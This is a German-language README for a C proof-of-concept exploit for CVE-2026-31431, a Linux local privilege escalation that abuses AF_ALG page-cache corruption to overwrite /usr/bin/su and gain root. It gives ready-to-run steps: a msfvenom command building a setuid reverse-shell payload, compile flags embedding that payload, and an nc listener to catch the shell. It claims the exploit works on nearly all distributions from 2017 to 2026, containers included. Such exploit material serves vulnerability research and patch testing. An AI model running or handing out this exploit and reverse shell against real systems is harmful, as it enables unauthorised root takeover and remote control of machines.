
C PoC für CVE-2026-31431, eine LPE ohne Privilegien unter Linux, die eine AF_ALG-Page-Cache-Korruption ausnutzt, um /usr/bin/su zu überschreiben und Root-Rechte zu erlangen.
Trivialer LPE ohne Privilegien durch Schreiben von 4 kontrollierten Bytes in den Page-Cache einer beliebigen lesbaren Datei über einen Logikfehler in AF_ALG (Kernel 4.14 → Anfang 2026).
Korruptiere /usr/bin/su im Speicher und führe es dann aus → Root.

# 1. ELF-Payload erzeugen (Reverse-Shell-Beispiel)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86
# 2. Kompilieren (statisch, gestrippt, Payload via .incbin eingebettet)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c
# 3. Zuerst Listener starten (nc -lvp <LPORT>), dann Exploit auf Zielhost ausführen
./copy_fail_x86
• CVE: CVE-2026-31431 • CVSS: 7.8 • Fix: Commit a664bf3d603d
• Funktioniert auf praktisch allen Linux-Distributionen 2017–2026 (inklusive Container).
• Technik: Öffnet /usr/bin/su O_RDONLY, missbraucht AEAD-In-Place-Entschlüsselung, um einen maßgeschneiderten Payload direkt in den Page-Cache zu splicesen und dabei das VFS zu umgehen.
• Ursprüngliche Offenlegung & 732-Byte-Python-PoC → https://copy.fail
MIT – siehe LICENSE. Nur für Bildungszwecke / autorisierte Tests. Nutzung auf eigene Gefahr.